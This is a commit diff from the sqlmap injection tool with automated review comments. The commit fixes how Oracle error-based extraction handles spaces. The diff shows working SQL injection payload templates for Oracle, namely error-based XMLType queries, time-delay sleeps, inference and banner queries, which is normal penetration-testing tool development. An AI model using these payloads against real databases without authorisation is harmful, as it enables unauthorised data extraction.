	fix for Oracle error based query "space" problem
							parent
							
								
									878135fe40
								
							
						
					
					
						commit
						bf850af2d8
					
				|  | @ -358,11 +358,13 @@ def __goError(expression, resumeValue=True): | |||
| 
 | ||||
|     if match: | ||||
|         output = match.group('result') | ||||
|         if kb.dbms == "Oracle" and output: | ||||
|             output = output.replace("__SPACE__", " ") | ||||
| 
 | ||||
|     return output | ||||
| 
 | ||||
| 
 | ||||
| def getValue(expression, blind=True, inband=True, error=False, fromUser=False, expected=None, batch=False, unpack=True, sort=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=False): | ||||
| def getValue(expression, blind=True, inband=True, error=True, fromUser=False, expected=None, batch=False, unpack=True, sort=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=False): | ||||
|     """ | ||||
|     Called each time sqlmap inject a SQL query on the SQL injection | ||||
|     affected parameter. It can call a function to retrieve the output | ||||
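Review bot: The `getValue` signature is printed twice, first with `error=False` and then with `error=True`; if the second is the new side (the page has lost its +/- markers, so this is inferred from the usual old-then-new order), the commit flips the default for every caller that does not pass `error`, which the commit title does not mention and which looks like a leftover from testing. I would keep `error=False` here and make that change separately if it is intended. In `__goError`, `output.replace("__SPACE__", " ")` also rewrites any retrieved value that genuinely contains the text `__SPACE__`, and the marker is duplicated as a bare literal in the Oracle `<error>` query; a comment such as `# "__SPACE__" must match the REPLACE() marker in the Oracle <error> query; values containing it literally are altered` would document both. Both function bodies continue outside the hunk.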
|  |  | |||
|  | @ -91,7 +91,8 @@ | |||
|         <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/> | ||||
|         <substring query="SUBSTR((%s), %d, %d)"/> | ||||
|         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/> | ||||
|         <error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P<result>.+?)&quot;"/> | ||||
|         <!--<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P<result>.+?)&quot;"/>--> | ||||
|         <error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),'__SPACE__'))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P<result>.+?)&quot;"/> | ||||
|         <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/> | ||||
|         <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/> | ||||
|         <current_user query="SELECT USER FROM DUAL"/> | ||||
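Review bot: The superseded `<error>` entry is left in the file as an XML comment directly above its replacement; version control already keeps the old query, so the commented line should be deleted rather than carried along. The new query hard-codes the marker `'__SPACE__'`, which `__goError` reverses with a matching string literal, so the two files must change together; a short comment above the entry, for example `<!-- '__SPACE__' is turned back into a space in __goError(); keep both in sync -->`, would record that. The enclosing element (presumably the Oracle section) starts and ends outside the hunk.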
|  |  | |||